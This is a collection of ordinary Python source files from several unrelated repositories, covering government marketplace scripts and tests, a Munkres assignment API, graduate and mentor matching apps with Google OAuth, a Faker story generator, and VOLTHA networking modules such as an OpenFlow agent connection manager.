return data_client.get_framework_stats(framework_slug)
def snapshot_framework_stats(api_endpoint, api_token, framework_slug):
data_client = dmapiclient.DataAPIClient(api_endpoint, api_token)
stats = get_stats(data_client, framework_slug)
data_client.create_audit_event(
AuditTypes.snapshot_framework_stats,
data=stats,
object_type='frameworks',
object_id=framework_slug
)
logger.info("Framework stats snapshot saved")
if __name__ == '__main__':
arguments = docopt(__doc__)
snapshot_framework_stats(
get_api_endpoint_from_stage(arguments['<stage>']),
get_auth_token('api', arguments['<stage>']),
arguments['<framework_slug>'],
)
```
#### File: digitalmarketplace-scripts/tests/conftest.py
```python
import json
import os
import pytest
from mock import Mock
import requests_mock
FIXTURES_DIR = os.path.join(os.path.dirname(__file__), 'fixtures')
@pytest.fixture
def mock_data_client():
"""Mock data client for use in tests. These can be overwritten in individual tests."""
mock_data_client = Mock()
mock_data_client.get_framework.return_value = dict(frameworks=dict(lots=[
{'slug': 'test_lot_slug_1'},
{'slug': 'test_lot_slug_2'},
]))
mock_data_client.find_draft_services_iter.return_value = {}
mock_data_client.export_users.return_value = {
'users': [
{'supplier_id': 12345, 'application_status': 'application', 'extraneous_field': 'foo'},
{'supplier_id': 23456, 'application_status': 'no_application', 'extraneous_field': 'foo'},
{'supplier_id': 123, 'application_status': 'application', 'extraneous_field': 'foo'},
{'supplier_id': 456, 'application_status': 'application', 'extraneous_field': 'foo'},
{'supplier_id': 789, 'application_status': 'no_application', 'extraneous_field': 'foo'},
{'supplier_id': 101, 'application_status': 'no_application', 'extraneous_field': 'foo'}
]
}
with open(os.path.join(FIXTURES_DIR, 'test_supplier_frameworks_response.json')) as supplier_frameworks_response:
mock_data_client.find_framework_suppliers.return_value = json.loads(supplier_frameworks_response.read())
return mock_data_client
@pytest.yield_fixture
def rmock():
with requests_mock.mock() as rmock:
real_register_uri = rmock.register_uri
def register_uri_with_complete_qs(*args, **kwargs):
if 'complete_qs' not in kwargs:
kwargs['complete_qs'] = True
return real_register_uri(*args, **kwargs)
rmock.register_uri = register_uri_with_complete_qs
yield rmock
```
#### File: tests/helpers/test_brief_data_helpers.py
```python
import mock
import datetime
import pytest
from dmscripts.helpers import brief_data_helpers
class TestGetBriefsClosedOnDate:
def test_get_briefs_closed_on_date_filters_by_date_closed(self):
api_client = mock.Mock()
api_client.find_briefs_iter.return_value = iter([
{"applicationsClosedAt": "2016-09-04T23:59:59.000000Z", "status": "closed"},
{"applicationsClosedAt": "2016-09-05T00:00:00.000000Z", "status": "closed"},
{"applicationsClosedAt": "2016-09-05T08:29:39.000001Z", "status": "closed"},
{"applicationsClosedAt": "2016-09-05T23:59:59.000000Z", "status": "closed"},
{"applicationsClosedAt": "2016-09-06T00:00:00.000000Z", "status": "closed"},
])
assert brief_data_helpers.get_briefs_closed_on_date(api_client, datetime.date(2016, 9, 5)) == [
{"applicationsClosedAt": "2016-09-05T00:00:00.000000Z", "status": "closed"},
{"applicationsClosedAt": "2016-09-05T08:29:39.000001Z", "status": "closed"},
{"applicationsClosedAt": "2016-09-05T23:59:59.000000Z", "status": "closed"},
]
def test_get_briefs_closed_on_date_throws_error_for_briefs_without_application_closed_at(self):
api_client = mock.Mock()
api_client.find_briefs_iter.return_value = iter([
{"applicationsClosedAt": "2016-09-05T23:59:59.000000Z", "status": "closed"},
{"status": "closed"}
])
with pytest.raises(KeyError):
brief_data_helpers.get_briefs_closed_on_date(api_client, datetime.date(2016, 9, 5))
``` |
{
"source": "jonodrew/graduate-rotator",
"score": 3
} |
#### File: app/munkres_api/routes.py
```python
from app.munkres_api import munkres_bp
from munkres import Munkres
import json
from flask import request, jsonify
import sys
@munkres_bp.route("/process-matrix", methods=["POST"])
def process_matrix():
"""
This api takes a list of lists and returns a list of coordinates. The list of list represents an n x m matrix of numbers. This function finds the path
through the matrix that returns the highest value
:return:
"""
matrix = json.loads(request.data).get("matrix")
cost_matrix = [[sys.maxsize - col for col in row] for row in matrix]
m = Munkres()
indexes = m.compute(cost_matrix)
return jsonify(indexes)
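# Illustrative client-side sketch (host/port and blueprint mount point are
# assumptions; the numbers are made up): posting a 3x3 "profit" matrix and
# reading back the chosen assignment. Because each entry is converted to a
# cost (sys.maxsize - value) above, the minimising Munkres algorithm ends up
# maximising the original values.
#
#   import requests
#   resp = requests.post("http://localhost:5000/process-matrix",
#                        json={"matrix": [[5, 9, 1], [10, 3, 2], [8, 7, 4]]})
#   resp.json()  # -> e.g. [[0, 1], [1, 0], [2, 2]] (row, column) pairs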
``` |
{
"source": "jonodrew/matchex",
"score": 3
} |
#### File: jonodrew/matchex/classes.py
```python
class Candidate(object):
def __init__(self, name, priorDepartment, priorAnchor, priorSkill1,
priorSkill2, priorLocation, XX, wantedAnchor, wantedSkill1,
wantedAnchor2,wantedSkill2,wantedComp1,wantedComp2,wantedComp3,wantedDept1,
wantedDept2,wantedDept3,wantedDept4,wantedDept5,wantedDept6,wantedDept7,
wantedDept8,wantedDept9,wantedDept10,secondment,wantedLocation,restrictions,
security,cohort):
self.name = name
self.priorDepartment = priorDepartment
self.priorAnchor = priorAnchor
self.priorSkill1 = priorSkill1
self.priorSkill2 = priorSkill2
self.priorLocation = priorLocation
self.XX = XX
self.wantedAnchor = wantedAnchor
self.wantedSkill1 = wantedSkill1
self.wantedAnchor2 = wantedAnchor2
self.wantedSkill2 = wantedSkill2
self.wantedComp1 = wantedComp1
self.wantedComp2 = wantedComp2
self.wantedComp3 = wantedComp3
self.wantedDept1 = wantedDept1
self.wantedDept2 = wantedDept2
self.wantedDept3 = wantedDept3
self.wantedDept4 = wantedDept4
self.wantedDept5 = wantedDept5
self.wantedDept6 = wantedDept6
self.wantedDept7 = wantedDept7
self.wantedDept8 = wantedDept8
self.wantedDept9 = wantedDept9
self.wantedDept10 = wantedDept10
self.secondment = secondment
self.wantedLocation = wantedLocation
self.restrictions = restrictions
self.security = security
self.cohort = cohort
class Posting(object):
def __init__(self, code, department, anchor, skill1, skill2, location, name,
competency1, competency2, competency3, security, cohort):
self.code = code
self.department = department
self.anchor = anchor
self.skill1 = skill1
self.skill2 = skill2
self.location = location
self.name = name
self.competency1 = competency1
self.competency2 = competency2
self.competency3 = competency3
self.security = security
self.cohort = cohort
class Weighting(object):
def __init__(self,department,anchor,skill,location,competency,restriction,
previous_location):
self.department = department
self.anchor = anchor
self.skill = skill
self.location = location
        self.competency = competency
        self.restriction = restriction
        self.previous_location = previous_location
class ReturnValue(object):
def __init__(self, y0, y1, y2):
self.y0 = y0
self.y1 = y1
self.y2 = y2
```
#### File: jonodrew/matchex/test1.py
```python
def test(a, b):
    # Initialise the score before the loop so the first increment does not
    # raise an UnboundLocalError; a mismatch still resets the running score.
    score = 0
    for i in range(len(a)):
        if a[i] == b[i]:
            score += 1
        else:
            score = 0
    print(score)
``` |
{
"source": "jonodrew/mentor-match",
"score": 3
} |
#### File: app/auth/routes.py
```python
import os
import flask
from app.auth import auth_bp
from flask import redirect, url_for
import google_auth_oauthlib.flow # type: ignore
CONFIG = {
"web": {
"client_id": os.environ.get("GOOGLE_CLIENT_ID"),
"project_id": "mentor-match-333011",
"auth_uri": "https://accounts.google.com/o/oauth2/auth",
"token_uri": "https://oauth2.googleapis.com/token",
"auth_provider_x509_cert_url": "https://www.googleapis.com/oauth2/v1/certs",
"client_secret": os.environ.get("GOOGLE_CLIENT_SECRET"),
}
}
@auth_bp.route("/login", methods=["GET", "POST"])
def authorize():
flow = google_auth_oauthlib.flow.Flow.from_client_config(
client_config=CONFIG,
scopes=["https://www.googleapis.com/auth/drive"],
)
flow.redirect_uri = url_for("auth.callback", _external=True)
authorization_url, state = flow.authorization_url(
access_type="offline", include_granted_scopes="true"
)
flask.session["state"] = state
return redirect(authorization_url)
@auth_bp.route("/callback", methods=["GET"])
def callback():
state = flask.session["state"]
flow = google_auth_oauthlib.flow.Flow.from_client_config(
client_config=CONFIG,
scopes=["https://www.googleapis.com/auth/drive"],
state=state,
)
flow.redirect_uri = flask.url_for("auth.callback", _external=True)
authorization_response = flask.request.url
flow.fetch_token(authorization_response=authorization_response)
credentials = flow.credentials
flask.session["credentials"] = {
"token": credentials.token,
"refresh_token": credentials.refresh_token,
"token_uri": credentials.token_uri,
"client_id": credentials.client_id,
"client_secret": credentials.client_secret,
"scopes": credentials.scopes,
}
return redirect(url_for("main.upload"))
```
#### File: app/main/routes.py
```python
from celery.result import AsyncResult
from flask import render_template, request
from app.main import main_bp
from app.tasks import create_task
@main_bp.route("/", methods=["GET"])
def index():
return render_template("index.html", title="Hello World!")
@main_bp.route("/upload", methods=["GET", "POST"])
def upload():
if request.method == "GET":
return render_template("input.html")
@main_bp.route("/tasks", methods=["POST"])
def run_task():
content = request.json
task_type = content["type"]
task = create_task.delay(int(task_type))
return {"task_id": task.id}, 202
@main_bp.route("/tasks/<task_id>", methods=["GET"])
def get_status(task_id):
task_result = AsyncResult(task_id)
result = {
"task_id": task_id,
"task_status": task_result.status,
"task_result": task_result.result,
}
return result, 200
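# Usage sketch (illustrative; host/port and the task's return value are
# assumptions): kick off a task via POST /tasks, then poll GET /tasks/<id>.
#
#   import requests
#   resp = requests.post("http://localhost:5000/tasks", json={"type": 1})
#   task_id = resp.json()["task_id"]          # returned with HTTP 202
#   status = requests.get("http://localhost:5000/tasks/" + task_id).json()
#   # -> {"task_id": "...", "task_status": "PENDING"/"SUCCESS", "task_result": ...}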
``` |
{
"source": "jonodrew/story_generator_p",
"score": 3
} |
#### File: jonodrew/story_generator_p/story.py
```python
from flask import Flask
from faker import Faker
from faker.providers import company, job, person, geo
app = Flask(__name__)
@app.route('/')
def story():
fake = Faker()
mystory = "<html><body><p>In a(n) " + fake.company()
mystory = mystory + " a young "
mystory = mystory + fake.language_name()
mystory = mystory + " stumbles across a(n) "
mystory = mystory + fake.domain_word()
mystory = mystory + " which spurs him into conflict with "
mystory = mystory + fake.name()
mystory = mystory + " an " + fake.catch_phrase()
mystory = mystory + " with the help of a(n) "
mystory = mystory + fake.job()
mystory = mystory + " and her "
mystory = mystory + fake.file_name()
mystory = mystory + " culminating in a struggle in "
mystory = mystory + fake.company()
mystory = mystory + " where someone shouts "
mystory = mystory + fake.bs()
mystory = mystory + " </p></body></html>"
return mystory
``` |
{
"source": "jonogreenz/py-pushover-open-client",
"score": 3
} |
#### File: py-pushover-open-client/examples/client_callback.py
```python
from pushover_open_client import Client
def messageCallback(messageList):
    # Process/do work with messageList!
if(messageList):
for message in messageList:
# Do work with message here!
# Make sure to acknowledge messages with priority >= 2
if(message.priority >= 2):
if(message.acked != 1):
client.acknowledgeEmergency(message.receipt)
        # Make sure you delete messages that you receive!
client.deleteMessages(messageList[-1].id)
# Set up the client with a device configuration
client = Client("example_device.cfg")
# Get any messages sent before the client has started
messageList = client.getOutstandingMessages()
# Do work with outstanding messages
# Make sure you delete messages that you receive!
if(messageList):
client.deleteMessages(messageList[-1].id)
# Pass our function as a parameter, this will run 'forever'
client.getWebSocketMessages(messageCallback)
# Can optionally continue doing other work here without the need
# to poll the websocket
``` |
{
"source": "jonohart/voltha",
"score": 3
} |
#### File: common/utils/deferred_utils.py
```python
from twisted.internet import reactor
from twisted.internet.defer import Deferred
from twisted.internet.error import AlreadyCalled
class TimeOutError(Exception): pass
class DeferredWithTimeout(Deferred):
"""
    Deferred with a timeout. If neither the callback nor the errback method
    is called within the given time, the deferred's errback will be fired
    with a TimeOutError() exception.
    All other usage is the same as for Deferred().
"""
def __init__(self, timeout=1.0):
Deferred.__init__(self)
self._timeout = timeout
self.timer = reactor.callLater(timeout, self.timed_out)
def timed_out(self):
self.errback(
TimeOutError('timed out after {} seconds'.format(self._timeout)))
def callback(self, result):
self._cancel_timer()
return Deferred.callback(self, result)
def errback(self, fail):
self._cancel_timer()
return Deferred.errback(self, fail)
def cancel(self):
self._cancel_timer()
return Deferred.cancel(self)
def _cancel_timer(self):
try:
self.timer.cancel()
except AlreadyCalled:
pass
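# Usage sketch (illustrative; assumes the twisted reactor is running and that
# `handle_result` / `handle_timeout` are caller-supplied functions):
#
#   d = DeferredWithTimeout(timeout=2.0)
#   d.addCallback(handle_result)
#   d.addErrback(handle_timeout)   # fired with TimeOutError after 2 seconds
#   # Calling d.callback(value) or d.errback(failure) before the timeout
#   # cancels the internal timer, so the TimeOutError never fires.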
```
#### File: common/utils/indexpool.py
```python
from bitstring import BitArray
import structlog
log = structlog.get_logger()
class IndexPool(object):
def __init__(self, max_entries, offset):
self.max_entries = max_entries
self.offset = offset
self.indices = BitArray(self.max_entries)
def get_next(self):
try:
_pos = self.indices.find('0b0')
self.indices.set(1, _pos)
return self.offset + _pos[0]
except IndexError:
log.info("exception-fail-to-allocate-id-all-bits-in-use")
return None
def allocate(self, index):
try:
_pos = index - self.offset
if not (0 <= _pos < self.max_entries):
log.info("{}-out-of-range".format(index))
return None
if self.indices[_pos]:
log.info("{}-is-already-allocated".format(index))
return None
self.indices.set(1, _pos)
return index
except IndexError:
return None
def release(self, index):
index -= self.offset
_pos = (index,)
try:
self.indices.set(0, _pos)
except IndexError:
log.info("bit-position-{}-out-of-range".format(index))
    # Pre-allocate one index or multiple indices (setting them to 1); multiple indices must be passed as a tuple
def pre_allocate(self, index):
if(isinstance(index, tuple)):
_lst = list(index)
for i in range(len(_lst)):
_lst[i] -= self.offset
index = tuple(_lst)
self.indices.set(1, index)
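if __name__ == '__main__':
    # Minimal, illustrative self-check (not part of the original module): a
    # pool of 8 indices starting at offset 1024, e.g. for allocating port ids.
    pool = IndexPool(max_entries=8, offset=1024)
    first = pool.get_next()             # -> 1024
    second = pool.get_next()            # -> 1025
    assert (first, second) == (1024, 1025)
    pool.release(first)                 # 1024 becomes available again
    pool.pre_allocate((1026, 1027))     # reserve two indices up front
    assert pool.get_next() == 1024      # the released index is handed out first
    assert pool.allocate(1027) is None  # already taken by pre_allocate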
```
#### File: common/utils/json_format.py
```python
from google.protobuf import json_format
class _PatchedPrinter(json_format._Printer):
def __init__(self, including_default_value_fields=False,
preserving_proto_field_name=False,
strict_any_handling=False):
super(_PatchedPrinter, self).__init__(including_default_value_fields,
preserving_proto_field_name)
self.strict_any_handling = strict_any_handling
def _BestEffortAnyMessageToJsonObject(self, msg):
try:
res = self._AnyMessageToJsonObject(msg)
except TypeError:
res = self._RegularMessageToJsonObject(msg, {})
return res
def MessageToDict(message,
including_default_value_fields=False,
preserving_proto_field_name=False,
strict_any_handling=False):
"""Converts protobuf message to a JSON dictionary.
Args:
message: The protocol buffers message instance to serialize.
including_default_value_fields: If True, singular primitive fields,
repeated fields, and map fields will always be serialized. If
False, only serialize non-empty fields. Singular message fields
and oneof fields are not affected by this option.
preserving_proto_field_name: If True, use the original proto field
names as defined in the .proto file. If False, convert the field
names to lowerCamelCase.
    strict_any_handling: If True, conversion will error out (like in the
original method) if an Any field with value for which the Any type
is not loaded is encountered. If False, the conversion will leave
the field un-packed, but otherwise will continue.
Returns:
A dict representation of the JSON formatted protocol buffer message.
"""
printer = _PatchedPrinter(including_default_value_fields,
preserving_proto_field_name,
strict_any_handling=strict_any_handling)
# pylint: disable=protected-access
return printer._MessageToJsonObject(message)
def MessageToJson(message,
including_default_value_fields=False,
preserving_proto_field_name=False,
strict_any_handling=False):
"""Converts protobuf message to JSON format.
Args:
message: The protocol buffers message instance to serialize.
including_default_value_fields: If True, singular primitive fields,
repeated fields, and map fields will always be serialized. If
False, only serialize non-empty fields. Singular message fields
and oneof fields are not affected by this option.
preserving_proto_field_name: If True, use the original proto field
names as defined in the .proto file. If False, convert the field
names to lowerCamelCase.
    strict_any_handling: If True, conversion will error out (like in the
original method) if an Any field with value for which the Any type
is not loaded is encountered. If False, the conversion will leave
the field un-packed, but otherwise will continue.
Returns:
A string containing the JSON formatted protocol buffer message.
"""
printer = _PatchedPrinter(including_default_value_fields,
preserving_proto_field_name,
strict_any_handling=strict_any_handling)
return printer.ToJsonString(message)
json_format._WKTJSONMETHODS['google.protobuf.Any'] = [
'_BestEffortAnyMessageToJsonObject',
'_ConvertAnyMessage'
]
json_format._Printer._BestEffortAnyMessageToJsonObject = \
json_format._Printer._AnyMessageToJsonObject
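# Usage sketch (illustrative): these helpers are drop-in replacements for the
# stock google.protobuf.json_format functions, with the extra
# strict_any_handling switch. `my_pb2.MyMessage` is a placeholder for any
# generated protobuf message class.
#
#   msg = my_pb2.MyMessage(name='olt-1')
#   as_dict = MessageToDict(msg, preserving_proto_field_name=True)
#   as_json = MessageToJson(msg, strict_any_handling=False)
#   # With strict_any_handling=False, an Any field whose packed type is not
#   # loaded is left un-packed instead of raising, which is the point of the patch.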
```
#### File: voltha/dashd/dash_template.py
```python
from structlog import get_logger
from twisted.internet.defer import DeferredList, inlineCallbacks
import requests
import re
import sys
#
# This file contains the dashboard template information. It gets pulled into
# the dashd module and used to create the dashboards. The other option would
# be to put each of these in an individual text file and read them in when the
# dashd process starts. There isn't much advantage to doing so at this time.
#
# TODO: The creation of a template from Grafana is currently incomplete.
log = get_logger()
class DashTemplate(object):
def __init__(self, grafana_url):
self.grafana_url = grafana_url
self.rowSelector = '%port%' # Not currently used
self.rows = [
dict(
title = "%port% packet statistics"
)
]
self.panels = [
dict(
title = "%port% Packet Receive Statistics",
rx_64_pkts = \
("alias(perSecond(voltha.%device%.%deviceId%.%port%.rx_64_pkts), "
"'64b pkts/sec')"
),
rx_65_127_pkts = \
("alias(perSecond("
"voltha.%device%.%deviceId%.%port%.rx_65_127_pkts), "
" '65-127b pkts/sec')"
),
rx_128_255_pkts = \
("alias(perSecond("
"voltha.%device%.%deviceId%.%port%.rx_128_255_pkts), "
"'128-255b pkts/sec')"
),
rx_256_511_pkts = \
("alias(perSecond"
"(voltha.%device%.%deviceId%.%port%.rx_256_511_pkts), "
"'256-511b pkts/sec')"
),
rx_512_1023_pkts = \
("alias(perSecond("
"voltha.%device%.%deviceId%.%port%.rx_512_1023_pkts), "
"'512-1023b pkts/sec')"
),
rx_1024_1518_pkts = \
("alias(perSecond("
"voltha.%device%.%deviceId%.%port%.rx_1024_1518_pkts), "
"'1024-1518b pkts/sec')"
),
rx_1519_9k_pkts = \
("alias(perSecond("
"voltha.%device%.%deviceId%.%port%.rx_1519_9k_pkts), "
"'1519b-9kb pkts/sec')"
)
),
dict(
title = "%port% Packet Send Statistics",
tx_64_pkts = \
("alias(perSecond(voltha.%device%.%deviceId%.%port%.tx_64_pkts), "
"'64b pkts/sec')"
),
tx_65_127_pkts = \
("alias(perSecond("
"voltha.%device%.%deviceId%.%port%.tx_65_127_pkts), "
"'65-127b pkts/sec')"
),
tx_128_255_pkts = \
("alias(perSecond("
"voltha.%device%.%deviceId%.%port%.tx_128_255_pkts), "
"'128-255b pkts/sec')"
),
tx_256_511_pkts = \
("alias(perSecond("
"voltha.%device%.%deviceId%.%port%.tx_256_511_pkts), "
"'256-511b pkts/sec')"
),
tx_512_1023_pkts = \
("alias(perSecond("
"voltha.%device%.%deviceId%.%port%.tx_512_1023_pkts), "
"'512-1023b pkts/sec')"
),
tx_1024_1518_pkts = \
("alias(perSecond("
"voltha.%device%.%deviceId%.%port%.tx_1024_1518_pkts), "
"'1024-1518b pkts/sec')"
),
tx_1519_9k_pkts = \
("alias(perSecond("
"voltha.%device%.%deviceId%.%port%.tx_1519_9k_pkts), "
"'1519b-9kb pkts/sec')"
)
)
]
self.dashRow = '''
{
"collapse": false,
"editable": true,
"height": "250px",
"title": "Row",
"panels": []
}
'''
self.dashTarget = '''
{
"refId": "",
"target": ""
}
'''
self.dashPanel = '''
{
"aliasColors": {},
"bars": false,
"datasource": "Voltha Stats",
"editable": true,
"error": false,
"fill": 0,
"grid": {
"threshold1": null,
"threshold1Color": "rgba(216, 200, 27, 0.27)",
"threshold2": null,
"threshold2Color": "rgba(234, 112, 112, 0.22)"
},
"id": 1,
"isNew": true,
"legend": {
"avg": false,
"current": false,
"max": false,
"min": false,
"show": true,
"total": false,
"values": false
},
"lines": true,
"linewidth": 1,
"links": [],
"nullPointMode": "connected",
"percentage": false,
"pointradius": 5,
"points": false,
"renderer": "flot",
"seriesOverrides": [],
"span": 6,
"stack": false,
"steppedLine": false,
"targets": [
],
"timeFrom": null,
"timeShift": null,
"title": "",
"tooltip": {
"msResolution": true,
"shared": true,
"value_type": "cumulative"
},
"type": "graph",
"xaxis": {
"show": true
},
"yaxes": [
{
"format": "short",
"label": null,
"logBase": 1,
"max": null,
"min": null,
"show": true
},
{
"format": "short",
"label": null,
"logBase": 1,
"max": null,
"min": null,
"show": true
}
]
}
'''
self.dashBoard = '''
{
"dashboard":{
"annotations": {
"list": []
},
"refresh": "1m",
"editable": true,
"hideControls": false,
"id": null,
"overwrite": true,
"links": [],
"rows": [
],
"schemaVersion": 12,
"sharedCrosshair": false,
"style": "dark",
"tags": [],
"templating": {
"list": []
},
"time": {
"from": "now-30m",
"to": "now"
},
"timepicker": {
"refresh_intervals": [
"5s",
"10s",
"30s",
"1m",
"5m",
"15m",
"30m",
"1h",
"2h",
"1d"
],
"time_options": [
"5m",
"15m",
"1h",
"6h",
"12h",
"24h",
"2d",
"7d",
"30d"
]
},
"timezone": "browser",
"title": "",
"version": 0
}
}
'''
#TODO This functionality is a work in progress and needs to be completed.
def apply_template(self, tplt_info):
# The tplt_info is the record returned by Grafana as a result of a
# search request. This includes the id, title, uri, and other fields
# of no interest to us. The URI provides the key to access the
# dashboard definition from which we'll create a template.
try:
r = requests.get(self.grafana_url + "/dashboards/" + \
tplt_info['uri'])
db = r.json()
# We don't need all the meta-data so just keep the dashboard
# definition
db = db['dashboard']
# We need to null out the id to create new dashboards with the
# template.
db['id'] = None
# Extract the rows and empty them from the template
rows = db['rows']
db['rows']=[]
# Determine if the rows are wildcarded or fixed, if wildcarded they
# need to map to the port which will create one row per port if
# they're not wildcarded then the title will be used as the port id
# and the same fixed number of rows will be used for every
# dashboard.
# Wildcarding implies a single row so check that first.
if len(rows) == 1:
                # We might have wildcarding, search for it in the row title
match = re.search(r'%port%',rows[0]['title'])
if match:
# Yes there is a wildcard, flag it
log.info("Wildcard found in template row") #debug
else:
log.info("No wildcard found in template row") #debug
else:
# We don't have wildcarding
log.info("No wildcard possible in multi-row template") #debug
except:
e = sys.exc_info()
print("ERROR: ", e)
```
#### File: voltha/ofagent/connection_mgr.py
```python
import os
import sys
from twisted.internet import reactor
from twisted.internet.defer import Deferred, inlineCallbacks, returnValue
from common.utils.asleep import asleep
from common.utils.consulhelpers import get_endpoint_from_consul
from structlog import get_logger
import grpc
from grpc import StatusCode
from grpc._channel import _Rendezvous
from ofagent.protos import third_party
from protos import voltha_pb2
from protos.voltha_pb2 import OfAgentSubscriber
from grpc_client import GrpcClient
from agent import Agent
from google.protobuf.empty_pb2 import Empty
from common.utils.dockerhelpers import get_my_containers_name
log = get_logger()
# _ = third_party
class ConnectionManager(object):
def __init__(self, consul_endpoint, vcore_endpoint, controller_endpoints,
instance_id,
enable_tls=False, key_file=None, cert_file=None,
vcore_retry_interval=0.5, devices_refresh_interval=5,
subscription_refresh_interval=5):
log.info('init-connection-manager')
log.info('list-of-controllers', controller_endpoints=controller_endpoints)
self.controller_endpoints = controller_endpoints
self.consul_endpoint = consul_endpoint
self.vcore_endpoint = vcore_endpoint
self.instance_id = instance_id
self.enable_tls = enable_tls
self.key_file = key_file
self.cert_file = cert_file
self.channel = None
self.grpc_client = None # single, shared gRPC client to vcore
self.agent_map = {} # (datapath_id, controller_endpoint) -> Agent()
self.device_id_to_datapath_id_map = {}
self.vcore_retry_interval = vcore_retry_interval
self.devices_refresh_interval = devices_refresh_interval
self.subscription_refresh_interval = subscription_refresh_interval
self.subscription = None
self.running = False
def start(self):
if self.running:
return
log.debug('starting')
self.running = True
# Start monitoring the vcore grpc channel
reactor.callInThread(self.monitor_vcore_grpc_channel)
# Start monitoring logical devices and manage agents accordingly
reactor.callLater(0, self.monitor_logical_devices)
log.info('started')
return self
def stop(self):
log.debug('stopping')
# clean up all controller connections
for agent in self.agent_map.itervalues():
agent.stop()
self.running = False
self._reset_grpc_attributes()
log.info('stopped')
def resolve_endpoint(self, endpoint):
ip_port_endpoint = endpoint
if endpoint.startswith('@'):
try:
ip_port_endpoint = get_endpoint_from_consul(
self.consul_endpoint, endpoint[1:])
log.info(
'{}-service-endpoint-found'.format(endpoint), address=ip_port_endpoint)
except Exception as e:
log.error('{}-service-endpoint-not-found'.format(endpoint), exception=repr(e))
log.error('committing-suicide')
# Committing suicide in order to let docker restart ofagent
os.system("kill -15 {}".format(os.getpid()))
if ip_port_endpoint:
host, port = ip_port_endpoint.split(':', 2)
return host, int(port)
def _reset_grpc_attributes(self):
log.debug('start-reset-grpc-attributes')
if self.grpc_client is not None:
self.grpc_client.stop()
if self.channel is not None:
del self.channel
self.is_alive = False
self.channel = None
self.subscription = None
self.grpc_client = None
log.debug('stop-reset-grpc-attributes')
def _assign_grpc_attributes(self):
log.debug('start-assign-grpc-attributes')
host, port = self.resolve_endpoint(self.vcore_endpoint)
        log.info('resolved-vcore-endpoint', endpoint=self.vcore_endpoint, host=host, port=port)
assert host is not None
assert port is not None
# Establish a connection to the vcore GRPC server
self.channel = grpc.insecure_channel('{}:{}'.format(host, port))
self.is_alive = True
log.debug('stop-assign-grpc-attributes')
@inlineCallbacks
def monitor_vcore_grpc_channel(self):
log.debug('start-monitor-vcore-grpc-channel')
while self.running:
try:
# If a subscription is not yet assigned then establish new GRPC connection
# ... otherwise keep using existing connection details
if self.subscription is None:
self._assign_grpc_attributes()
# Send subscription request to register the current ofagent instance
container_name = self.instance_id
stub = voltha_pb2.VolthaLocalServiceStub(self.channel)
subscription = stub.Subscribe(OfAgentSubscriber(ofagent_id=container_name))
# If the subscriber id matches the current instance
# ... then the subscription has succeeded
if subscription is not None and subscription.ofagent_id == container_name:
if self.subscription is None:
# Keep details on the current GRPC session and subscription
log.debug('subscription-with-vcore-successful', subscription=subscription)
self.subscription = subscription
self.grpc_client = GrpcClient(self, self.channel).start()
# Sleep a bit in between each subscribe
yield asleep(self.subscription_refresh_interval)
# Move on to next subscribe request
continue
# The subscription did not succeed, reset and move on
else:
log.info('subscription-with-vcore-unavailable', subscription=subscription)
except _Rendezvous, e:
log.error('subscription-with-vcore-terminated',exception=e, status=e.code())
except Exception as e:
log.exception('unexpected-subscription-termination-with-vcore', e=e)
# Reset grpc details
# The vcore instance is either not available for subscription
# or a failure occurred with the existing communication.
self._reset_grpc_attributes()
# Sleep for a short period and retry
yield asleep(self.vcore_retry_interval)
log.debug('stop-monitor-vcore-grpc-channel')
@inlineCallbacks
def get_list_of_logical_devices_from_voltha(self):
while self.running:
log.info('retrieve-logical-device-list')
try:
stub = voltha_pb2.VolthaLocalServiceStub(self.channel)
devices = stub.ListLogicalDevices(Empty()).items
for device in devices:
log.info("logical-device-entry", id=device.id, datapath_id=device.datapath_id)
returnValue(devices)
except _Rendezvous, e:
log.error('vcore-communication-failure', exception=e, status=e.code())
if e.code() == StatusCode.UNAVAILABLE:
os.system("kill -15 {}".format(os.getpid()))
except Exception as e:
log.exception('logical-devices-retrieval-failure', exception=e)
log.info('reconnect', after_delay=self.vcore_retry_interval)
yield asleep(self.vcore_retry_interval)
def refresh_agent_connections(self, devices):
"""
Based on the new device list, update the following state in the class:
        * agent_map
        * device_id_to_datapath_id_map
:param devices: full device list freshly received from Voltha
:return: None
"""
# Use datapath ids for deciding what's new and what's obsolete
desired_datapath_ids = set(d.datapath_id for d in devices)
current_datapath_ids = set(datapath_ids[0] for datapath_ids in self.agent_map.iterkeys())
# if identical, nothing to do
if desired_datapath_ids == current_datapath_ids:
return
# ... otherwise calculate differences
to_add = desired_datapath_ids.difference(current_datapath_ids)
to_del = current_datapath_ids.difference(desired_datapath_ids)
# remove what we don't need
for datapath_id in to_del:
self.delete_agent(datapath_id)
# start new agents as needed
for device in devices:
if device.datapath_id in to_add:
self.create_agent(device)
log.debug('updated-agent-list', count=len(self.agent_map))
log.debug('updated-device-id-to-datapath-id-map',
map=str(self.device_id_to_datapath_id_map))
def create_agent(self, device):
datapath_id = device.datapath_id
device_id = device.id
for controller_endpoint in self.controller_endpoints:
agent = Agent(controller_endpoint, datapath_id,
device_id, self.grpc_client, self.enable_tls,
self.key_file, self.cert_file)
agent.start()
self.agent_map[(datapath_id,controller_endpoint)] = agent
self.device_id_to_datapath_id_map[device_id] = datapath_id
def delete_agent(self, datapath_id):
for controller_endpoint in self.controller_endpoints:
agent = self.agent_map[(datapath_id,controller_endpoint)]
device_id = agent.get_device_id()
agent.stop()
del self.agent_map[(datapath_id,controller_endpoint)]
del self.device_id_to_datapath_id_map[device_id]
@inlineCallbacks
def monitor_logical_devices(self):
log.debug('start-monitor-logical-devices')
while self.running:
log.info('monitoring-logical-devices')
# should change to a gRPC streaming call
# see https://jira.opencord.org/browse/CORD-821
try:
if self.channel is not None and self.grpc_client is not None:
# get current list from Voltha
devices = yield self.get_list_of_logical_devices_from_voltha()
# update agent list and mapping tables as needed
self.refresh_agent_connections(devices)
else:
log.info('vcore-communication-unavailable')
# wait before next poll
yield asleep(self.devices_refresh_interval)
except _Rendezvous, e:
log.error('vcore-communication-failure', exception=repr(e), status=e.code())
except Exception as e:
log.exception('unexpected-vcore-communication-failure', exception=repr(e))
log.debug('stop-monitor-logical-devices')
def forward_packet_in(self, device_id, ofp_packet_in):
datapath_id = self.device_id_to_datapath_id_map.get(device_id, None)
if datapath_id:
for controller_endpoint in self.controller_endpoints:
agent = self.agent_map[(datapath_id, controller_endpoint)]
agent.forward_packet_in(ofp_packet_in)
def forward_change_event(self, device_id, event):
datapath_id = self.device_id_to_datapath_id_map.get(device_id, None)
if datapath_id:
for controller_endpoint in self.controller_endpoints:
agent = self.agent_map[(datapath_id, controller_endpoint)]
agent.forward_change_event(event)
```
#### File: voltha/scripts/scriptbase.py
```python
import os
import sys
import requests
